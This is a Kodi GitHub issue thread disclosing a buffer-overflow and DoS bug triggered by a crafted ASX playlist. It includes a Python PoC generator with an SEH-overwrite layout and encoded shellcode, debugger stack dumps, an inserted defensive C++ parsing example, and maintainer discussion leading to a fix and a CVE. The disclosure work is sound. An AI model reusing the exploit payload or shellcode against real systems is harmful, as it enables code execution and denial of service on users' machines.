Kodi v19.0 Buffer Overflow #20305

Closed
1 task
haxpunk1337 opened this issue Oct 12, 2021 · 23 comments · Fixed by #20306

Comments

@haxpunk1337 (Author)

Bug report

Describe the bug

The attached ASX file causes a crash in Kodi v19.0 on Windows 10. To reproduce the issue, the attached file poc.asx can be used. It should crash with an access violation like the following:

Thread 65E4 exit
Thread E18 exit
Thread E14 exit
Breakpoint at 00007FFB6E343005 set!
INT3 breakpoint at ucrtbase.00007FFB6E343005 (00007FFB6E343005)!
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000

Expected Behavior

Should display "file type not supported" or "unable to open file".

Actual Behavior

To Reproduce

Steps to reproduce the behavior:

Firstly, close the running Kodi application.

```python
#!/usr/bin/env python3
# PoC generator as posted in the report. Python 3 with bytes and a binary
# write, so the \x.. values land in the file verbatim (text mode in Python 3
# would re-encode bytes such as \xa9\x9e as UTF-8).
head = (b'<ASX version="3.0">\n\n'  # opening tag, as seen in the debugger dump below
        b'<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_')
junk = b"A" * 1975
nseh = b"\x42\x61\x21\x61"
seh = b"\xa9\x9e\x41\x00"
adjust = b"\x30\x83\xc0\x0c"
shellcode = (b"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
             b"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
             b"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
             b"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
             b"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
             b"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_ = b"R" * 8000  # defined but not used in the posted payload
foot = b'playlis.wma"/>\n\n'

# The posted listing had "+foot" on its own line, which Python treats as a
# separate statement; joined here so the footer is actually appended.
payload = head + junk + nseh + seh + adjust + shellcode + junk + foot

with open("poc.asx", "wb") as fobj:
    fobj.write(payload)
```


poc.asx is generated.

Now open it with Kodi. It will take hours to open in Kodi; in some cases it crashes.
poc.zip (attached)

Debug

000000E0BFF4D5C8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5D0 000000E0BFF4DB00
000000E0BFF4D5D8 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5E0 000000E0BFF4DA60 &"Error null (0) or unexpected EOF found in input stream."
000000E0BFF4D5E8 00007FF6239DAD4D return to kodi.00007FF6239DAD4D from kodi.00007FF6252B641F
000000E0BFF4D5F0 000000E0BFF4DB90 "¸YK%ö\x7F"
000000E0BFF4D5F8 00007FFB6E34C001 ucrtbase.00007FFB6E34C001
000000E0BFF4D600 0000000000000052
000000E0BFF4D608 000000E0BFF4D900 &"¸YK%ö\x7F"
000000E0BFF4D610 000000000000001E
000000E0BFF4D618 0000000000000000
000000E0BFF4D620 0000000000000015
000000E0BFF4D628 0000021CBDAC1600
000000E0BFF4D630 00007FF62549D580 kodi.00007FF62549D580
000000E0BFF4D638 0000021CBDAC16A0 &"pt*%ö\x7F"
000000E0BFF4DC10 0000021CBDD71F10 "<ASX version="3.0">\r\n\r\n<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
000000E0BFF4DC18 0001000000000000
000000E0BFF4DC20 0000021CBF7D10A0
000000E0BFF4DC28 00000000BDA60930
000000E0BFF4DC30 00007FF6254B59B0 kodi.00007FF6254B59B0
000000E0BFF4DC38 0000000000000000
000000E0BFF4DC40 0000000000000000
000000E0BFF4DC48 00007FFB00000201
000000E0BFF4DC50 0000000000000006
000000E0BFF4DC58 0000000000000000
000000E0BFF4DC60 0000000000000000
000000E0BFF4DC68 0000000000000000
000000E0BFF4DC70 0000021CBF26F230
000000E0BFF4DC78 000000E0BFF4DBA0 "0YK%ö\x7F"
000000E0BFF4DC80 0000000000000000
000000E0BFF4DC88 0000000000000020
000000E0BFF4DC90 0000021CBF706200 "C:\Users\THINKPAD\Desktop\"
000000E0BFF4DC98 0000000000000000
000000E0BFF4DCA0 0000000000000000
000000E0BFF4DCA8 000000000000000F
000000E0BFF4DCB0 000006988439F3AC
000000E0BFF4DCB8 00007FFB70C347CD return to ntdll.00007FFB70C347CD from ntdll.00007FFB70C34880
000000E0BFF4DCC0 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DCC8 0000021CB4C59AC0
000000E0BFF4DCD0 000000E0BFF4DD89
000000E0BFF4DCD8 00007FF623CF1D19 return to kodi.00007FF623CF1D19 from ???
000000E0BFF4DCE0 0000021CB4C59AC0
000000E0BFF4DCE8 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF0 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DCF8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4DD00 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD08 0000021CBDDD72F0 &"à.¦#ö\x7F"
000000E0BFF4DD10 0000000000000000
000000E0BFF4DD18 0000000000000000
000000E0BFF4DD20 0000021CB4C59AC0
000000E0BFF4DD28 00007FF623A687D5 return to kodi.00007FF623A687D5 from kodi.00007FF6252ADB30
000000E0BFF4DD30 000000E0BFF4E110 &"profile/Database/MyMusic82.db"
000000E0BFF4DD38 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DD40 0000000000000000
000000E0BFF4DD48 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4DD50 0000021CB4C59AD0 &"À4¡#ö\x7F"
000000E0BFF4DD58 0000021CB4C59AC0
000000E0BFF4DD60 0000021C00000000
000000E0BFF4DD68 00007FF623E5964B return to kodi.00007FF623E5964B from kodi.00007FF6252ADB30
000000E0BFF4DD70 000000E0BFF4DE80
000000E0BFF4DD78 0000000000000013
000000E0BFF4DD80 FFFFFFFFFFFFFFFE
000000E0BFF4DD88 0000021CBDA60930 "C:\Users\THINKPAD\Desktop\poc.asx"
000000E0BFF4DD90 0000021CB4AB0100
000000E0BFF4DD98 0000000000000021
000000E0BFF4DDA0 000000000000002F
000000E0BFF4DDA8 000006988439F42C
000000E0BFF4DDB0 0000000000000000
000000E0BFF4DDB8 0000000000000000
000000E0BFF4DDC0 000000E0BFF4EB78
000000E0BFF4DDC8 0000000000000000
000000E0BFF4DDD0 0000021CB6CA4D10 &" ;Ã#ö\x7F"
000000E0BFF4DDD8 0000021CB6C02A20 &"à.¦#ö\x7F"
000000E0BFF4DDE0 000000E0BFF4DEF0
000000E0BFF4DDE8 00007FF623C33FEF return to kodi.00007FF623C33FEF from kodi.00007FF623CF1C60
000000E0BFF4DDF0 0000021CB4AB0100
000000E0BFF4DDF8 0000021CBF797C50
000000E0BFF4DE00 0000000000000000
000000E0BFF4DE08 0000000000000000
000000E0BFF4DE10 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DE18 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4DE20 0000021CB4AB0100
000000E0BFF4DE28 0000021CBF797E90
000000E0BFF4DE30 0000000000000000
000000E0BFF4DE38 0000000000000000
000000E0BFF4DE40 0000021CB4AB0000
000000E0BFF4DE48 0000000000000000
000000E0BFF4DE50 FFFFFFFFFFFFFFFE
000000E0BFF4DE58 00007FFB70C358D1 return to ntdll.00007FFB70C358D1 from ntdll.00007FFB70C34FE0
000000E0BFF4DE60 0000021CB4AB0340
000000E0BFF4DE68 FFFFFFFFFFFFFFFE
000000E0BFF4DE70 0000000000000003
000000E0BFF4DE78 0000021CBF523000
000000E0BFF4DE80 0000000000000008
000000E0BFF4DE88 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DE90 0000000000000000
000000E0BFF4DE98 000000E0BFF4E0F0 "ŒÈ9„˜\x06"
000000E0BFF4DEA0 0000000000000000
000000E0BFF4DEA8 0000000000000000
000000E0BFF4DEB0 0000000000000003
000000E0BFF4DEB8 00007FFB70C352DC return to ntdll.00007FFB70C352DC from ntdll.00007FFB70C32DF8
000000E0BFF4DEC0 0000021CBF3CAC88 "nd descriptors.\n\n Usage:\n\n class C(metaclass=ABCMeta):\n @AbstractMethod\n def my_abstract_method(self, ...):\n ...\n "
000000E0BFF4DEC8 0000000000000001
000000E0BFF4DED0 000006988439F6EC
000000E0BFF4DED8 0000000000000001
000000E0BFF4DEE0 0000000000000000
000000E0BFF4DEE8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF0 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DEF8 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF00 00000000FFFFFFFF
000000E0BFF4DF08 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4DF10 000000E0BFF4E020 "¼÷9„˜\x06"
000000E0BFF4DF18 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4DF20 0000000000000000
000000E0BFF4DF28 0000000000000000
000000E0BFF4DF30 00007FF6255DB960 kodi.00007FF6255DB960
000000E0BFF4DF38 0000000000000000
000000E0BFF4DF40 0000021CBF600DA0 "ÝÌÝÌ"
000000E0BFF4DF48 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF50 0000021CB4AB0340
000000E0BFF4DF58 00007FFB007000C0
000000E0BFF4DF60 0000021CBF797910
000000E0BFF4DF68 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4DF70 0000021CB4AB0100
000000E0BFF4DF78 0000021CBF0D4AC0
000000E0BFF4DF80 FFFFFFFFFFFFFFFE
000000E0BFF4DF88 FFFFFFFFFFFFFFFE
000000E0BFF4DF90 0000021CB4AB0000
000000E0BFF4DF98 0000000000000000
000000E0BFF4DFA0 0000021CBF001A80 "ÝÌÝÌ"
000000E0BFF4DFA8 FFFFFFFFFFFFFFFE
000000E0BFF4DFB0 000006988439FCFC
000000E0BFF4DFB8 0000021C004002A0
000000E0BFF4DFC0 0000000000000000
000000E0BFF4DFC8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFD0 00000000000002B8
000000E0BFF4DFD8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4DFE0 0000021CB85729A0
000000E0BFF4DFE8 0000021CBD0A9840 &" <\r$ö\x7F"
000000E0BFF4DFF0 000000E0BFF4E089 "æô¿à"
000000E0BFF4DFF8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E000 000006988439F79C
000000E0BFF4E008 00007FFB70C348D0 return to ntdll.00007FFB70C348D0 from ntdll.00007FFB70C35710
000000E0BFF4E010 0000021CBD0D26D0
000000E0BFF4E018 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E020 000006988439F7BC
000000E0BFF4E028 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E030 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E038 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E040 000006988439F7EC
000000E0BFF4E048 0000021CB69C48D0 &"0«¥#ö\x7F"
000000E0BFF4E050 0000000000000000
000000E0BFF4E058 0000000000000000
000000E0BFF4E060 0000000000000000
000000E0BFF4E068 FFFFFFFFFFFFFFFE
000000E0BFF4E070 FFFFFFFFFFFFFFFE
000000E0BFF4E078 0000021CB4C34800
000000E0BFF4E080 00000000FFFFFFFF
000000E0BFF4E088 000000E0BFF4E618 &"profile/Database/MyMusic82.db"
000000E0BFF4E090 0000021CBDFB4C00 "Thread %s %s terminating (autodelete)"
000000E0BFF4E098 00007FF623FC38D5 return to kodi.00007FF623FC38D5 from kodi.00007FF6252ADB30
000000E0BFF4E0A0 0000000000000000
000000E0BFF4E0A8 000000000000000F
000000E0BFF4E0B0 0000021CBD0D10D0 &"°Å\n$ö\x7F"
000000E0BFF4E0B8 00007FFB6E33F05B return to ucrtbase.00007FFB6E33F05B from ???
000000E0BFF4E0C0 0000021CBD0AA230
000000E0BFF4E0C8 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E0D0 000006988439C8EC
000000E0BFF4E0D8 0000021CB85729A0
000000E0BFF4E0E0 000006988439C8FC
000000E0BFF4E0E8 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E0F0 000006988439C88C
000000E0BFF4E0F8 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4E100 0000000000000000
000000E0BFF4E108 0000021CBDA9AEE0 &"ÀÆI%ö\x7F"
000000E0BFF4E110 0000021CBDFB4A00 "profile/Database/MyMusic82.db"
000000E0BFF4E118 0000021CBD20C1C0 "ð“Q%ö\x7F"
000000E0BFF4E120 0000000000000000
000000E0BFF4E128 000000000000000F
000000E0BFF4E130 000000E0BFF4E240
000000E0BFF4E138 00007FF623CB88AD return to kodi.00007FF623CB88AD from kodi.00007FF6252ADB30
000000E0BFF4E140 000000E0BFF4E201
000000E0BFF4E148 00007FF623C273E1 return to kodi.00007FF623C273E1 from kodi.00007FF6252ADB30
000000E0BFF4E150 00007FF6255193F0 kodi.00007FF6255193F0
000000E0BFF4E158 0000021C00000000
000000E0BFF4E160 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E168 00007FF623FFD296 return to kodi.00007FF623FFD296 from kodi.00007FF6252ADB30
000000E0BFF4E170 FFFFFFFFFFFFFFFE
000000E0BFF4E178 FFFFFFFFFFFFFFFE
000000E0BFF4E180 000006988439C81C
000000E0BFF4E188 0000021CBF0D4CC0 " return list(iterable)\n # Let the base class default method raise the TypeError\n return JSONEncoder.default(self, o)\n\n "
000000E0BFF4E190 0000021CBD20A8F0 "àž_%ö\x7F"
000000E0BFF4E198 00007FF623CB32BE return to kodi.00007FF623CB32BE from kodi.00007FF6252ADB30
000000E0BFF4F7E0 0000000000000000
000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ???
000000E0BFF4F7F0 0000000000000000
000000E0BFF4F7F8 0000000000000000
000000E0BFF4F800 0000000000000000
000000E0BFF4F808 0000000000000000
000000E0BFF4F810 0000000000000000
000000E0BFF4F818 0000000000000000
000000E0BFF4F820 0000000000000000
000000E0BFF4F828 0000000000000000
000000E0BFF4F830 0000000000000000
000000E0BFF4F838 0000000000000000
000000E0BFF4F840 000004E8FFFFFB30
000000E0BFF4F848 000004D0FFFFFB30
000000E0BFF4F850 0000000000000019
000000E0BFF4F858 0000000000000000
000000E0BFF4F860 0000000000000000
000000E0BFF4F868 0000000000000000
000000E0BFF4F870 0000000000000000
000000E0BFF4F878 0000000000000000
000000E0BFF4F880 0000000000000000
000000E0BFF4F888 0000000000000000
000000E0BFF4F890 0000000000000000
000000E0BFF4F898 0000000000000000
000000E0BFF4F8A0 0000000000000000
000000E0BFF4F8A8 0000000000000000
000000E0BFF4F8B0 0000000000000000
000000E0BFF4F8B8 0000000000000000
000000E0BFF4F8C0 0000000000000000
000000E0BFF4F8C8 0000000000000000
000000E0BFF4F8D0 0000000000000000
000000E0BFF4F8D8 0000000000000000
000000E0BFF4F8E0 0000000000000000
000000E0BFF4F8E8 0000000000000000
000000E0BFF4F8F0 0000000000000000
000000E0BFF4F8F8 0000000000000000
000000E0BFF4F900 0000000000000000
000000E0BFF4F908 0000000000000000
000000E0BFF4F910 0000000000000000
000000E0BFF4F918 0000000000000000

Your Environment

Used Operating system:

  • Windows 10 x64

  • Operating system version/name:

  • Kodi version: 19.0

note: Once the issue is made we require you to update it with new information or Kodi versions should that be required.
Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.
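The report above, together with the title of fuzzard's fix ("Turn istream into a std::string to handle large buffers"), gives the shape of the problem: the ASX playlist stream was handed to the XML parser directly, and a file whose single HREF attribute runs to thousands of bytes (and whose `seh` bytes end in a `\x00`, matching the TinyXML error text "unexpected EOF found in input stream" visible in the dump) was enough to stall or crash the player. The following C++ program is an added example, not Kodi's code and not the contents of #20306: it shows the pattern the fix title describes, reading the whole stream into a `std::string` before parsing, and adds two checks that are this editor's assumptions rather than anything in the Kodi patch: a hard size cap (`kMaxPlaylistBytes`) and rejection of embedded NUL bytes before the data reaches the parser. `BuildPocLikeAsx` constructs an input with the same layout as the posted poc.asx (header text taken from the debugger dump above, 1975 `A`s, the nseh/seh bytes, the footer); the shellcode blob is omitted because it does not affect either check.

```cpp
// Added example, not Kodi's code. Mirrors the shape of the #20306 fix
// (istream -> std::string before XML parsing) and adds two defensive
// checks that are assumptions of this example: a size cap and a NUL scan.
#include <algorithm>
#include <cstddef>
#include <istream>
#include <iterator>
#include <sstream>
#include <string>

enum class LoadResult { Ok, TooLarge, EmbeddedNul };

// Hypothetical cap. ASX playlists are tiny XML files; anything approaching
// 1 MiB is not a playlist a media player should try to parse.
constexpr std::size_t kMaxPlaylistBytes = 1u << 20;

// Read the whole stream into `out` with std::istreambuf_iterator (the idiom
// the fix title refers to), stopping as soon as the cap is hit so an
// oversized file is rejected before it is fully buffered, let alone parsed.
LoadResult LoadPlaylistData(std::istream& in, std::string& out,
                            std::size_t maxBytes = kMaxPlaylistBytes)
{
    out.clear();
    out.reserve(std::min<std::size_t>(maxBytes, 64 * 1024));
    for (std::istreambuf_iterator<char> it(in), end; it != end; ++it) {
        if (out.size() >= maxBytes)
            return LoadResult::TooLarge;
        out.push_back(*it);
    }
    // TinyXML reports a NUL in its input as "unexpected EOF found in input
    // stream" (the message in the report's dump). Refuse it up front instead
    // of letting the parser discover it.
    if (out.find('\0') != std::string::npos)
        return LoadResult::EmbeddedNul;
    return LoadResult::Ok;  // `out` is now what you would hand to xmlDoc.Parse()
}

// Convenience wrapper for in-memory input.
LoadResult ClassifyPlaylist(const std::string& data,
                            std::size_t maxBytes = kMaxPlaylistBytes)
{
    std::istringstream in(data);
    std::string body;
    return LoadPlaylistData(in, body, maxBytes);
}

// Constructed input with the same layout as the reported poc.asx: the header
// seen in the debugger dump, `junkLen` 'A's, the nseh/seh bytes (the last
// byte of seh is the NUL), then the footer. No shellcode; it is irrelevant
// to both checks.
std::string BuildPocLikeAsx(std::size_t junkLen = 1975)
{
    std::string s = "<ASX version=\"3.0\">\n\n"
                    "<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_";
    s.append(junkLen, 'A');
    s.append("\x42\x61\x21\x61", 4);  // nseh
    s.append("\xa9\x9e\x41\x00", 4);  // seh, ends in NUL
    s.append("playlis.wma\"/>\n\n");
    return s;
}

int main()
{
    bool ok =
        ClassifyPlaylist(BuildPocLikeAsx()) == LoadResult::EmbeddedNul &&
        ClassifyPlaylist(std::string(kMaxPlaylistBytes + 1, 'A')) == LoadResult::TooLarge &&
        ClassifyPlaylist("<ASX version=\"3.0\"><REF HREF=\"mms://a/b.wma\"/></ASX>") == LoadResult::Ok;
    return ok ? 0 : 1;
}
```

The cap is checked inside the read loop rather than after it, so a multi-gigabyte file is refused after `kMaxPlaylistBytes` bytes instead of being buffered in full first; the NUL scan runs on the buffered copy because the parser's own handling of that byte is exactly what produced the error string in the report.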

@haxpunk1337 (Author)

Tried with other extensions too; it runs efficiently.

fuzzard pushed a commit to fuzzard/xbmc that referenced this issue Oct 12, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@fuzzard (Contributor)

fuzzard commented Oct 12, 2021

Would you mind trying the following as a possible fix fuzzard@80c8138

@haxpunk1337 (Author)

I think it's working fine :)

@haxpunk1337 (Author)

Hi Team,

Is this eligible for a CVE?

Thank YOU

@basilgello (Collaborator)

> Is this eligible for a CVE?

Yes

@haxpunk1337 (Author)

haxpunk1337 commented Oct 15, 2021 via email

@basilgello (Collaborator)

I ran your PoC under Debian 12 with debug symbols and it seems that TinyXML iterates back and forth in https://salsa.debian.org/debian/tinyxml/-/blob/master/tinyxmlparser.cpp#L903 Though no memory corruption was seen after 1h. It is definitely a DoS, but if you can send the DrWatson crash logs, we can check if it can lead to a more severe rank.

@haxpunk1337 (Author)

haxpunk1337 commented Oct 15, 2021 via email

@basilgello (Collaborator)

Great, so you observe a breakpoint exception (80000003). Good ol' times :)

Did you encounter c0000005 (MEMORY_ACCESS_VIOLATION) with your PoC?

@haxpunk1337 (Author)

haxpunk1337 commented Oct 15, 2021 via email

@basilgello (Collaborator)

> I didn't encounter any memory access violations :(

It's still a great find! I am just trying to understand if we need to backport this fix to 18.x and 17.x :) An access violation that leads to RCE must be ported ASAP.

@haxpunk1337 (Author)

Hi Team,

I think I found another issue:

Kodi is not able to parse or load a folder which contains a maliciously crafted .asx file, which leads to an application-level DoS.

Test case

I have created a .asx file in the poc folder.
I was able to navigate all folders except the POC folder.

pocvideo.zip (attached)

Note that memory consumption was very high.

Stack Trace:
00000092d08ff7f0 00007ff7c3c3b503 : 00000258432a6e98 000002584325b410 0000000000000001 0000000000000000 : kodi+0x1be56f
00000092d08ff880 00007ff7c550dd3e : 0000000000000005 0000000000000000 0000000000000000 0000000000000000 : kodi+0x1ab503
00000092d08ffbf0 00007ffc7ae17034 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : kodi!process_jpeg+0x144244e
00000092d08ffc30 00007ffc7bca2651 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : kernel32!BaseThreadInitThunk+0x14
00000092d08ffc60 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : ntdll!RtlUserThreadStart+0x21

STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_NAME: kodi!process_jpeg+190b3f

MODULE_NAME: kodi

IMAGE_NAME: kodi.exe

FAILURE_BUCKET_ID: BREAKPOINT_80000003_kodi.exe!process_jpeg

OS_VERSION: 10.0.19041.1

Thank You

@haxpunk1337 (Author)

@fuzzard (Contributor)

fuzzard commented Oct 16, 2021

What are the repro instructions for this second instance?
Is this already solved with the proposed PR fix?

@basilgello (Collaborator)

@fuzzard it is likely a JPEG thumbnailer issue...

@fuzzard (Contributor)

fuzzard commented Oct 16, 2021

I ask because he says an asx file in the poc folder. The zip is just an animated gif. Can't repro an issue on my end, hence the request for exact repro instructions.

@haxpunk1337 (Author)

@fuzzard (Contributor)

fuzzard commented Oct 16, 2021

That's the original PoC you provided, isn't it? So what's the second issue?

Or are you just saying that when that is in a folder, and you view the folder, it has the same effect as trying to open the asx file? If so, that's what I saw when I looked into it, and my proposed PR resolves that issue.

@haxpunk1337 (Author)

When that is in a folder and you view the folder, it has the same effect as trying to open the asx file. Likely a JPEG thumbnailer issue which is affecting kodi!process_jpeg+190b3f.

@fuzzard (Contributor)

fuzzard commented Oct 16, 2021

Is it an issue when used with the following PR applied? #20306

I'm just trying to understand if something else is required here, or if it's already fixed with that PR.

fuzzard pushed a commit to fuzzard/xbmc that referenced this issue Oct 17, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@haxpunk1337 (Author)

haxpunk1337 commented Oct 20, 2021 via email

@basilgello (Collaborator)

basilgello commented Oct 20, 2021

@haxpunk1337 Assigning a CVE is MITRE's job, not ours. Did you apply for a CVE here: https://www.cve.org/ResourcesSupport/ReportRequest#RequestCVEID ?

As I said, this is a DoS bug which qualifies for a CVE.

If by CVE you mean bug bounty this time, I think it's time to open the security page on the Kodi website!

UPD: Previously it was a single form to submit a CVE on the MITRE site; now they changed the workflow :(

graysky2 pushed a commit to graysky2/xbmc that referenced this issue Oct 23, 2021
Turn istream into a std::string to handle large buffers (xbmc#20305)
@haxpunk1337 (Author)

CVE is Assigned for this issue:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42917

joseluismarti pushed a commit to joseluismarti/xbmc that referenced this issue Apr 15, 2022
Turn istream into a std::string to handle large buffers (xbmc#20305)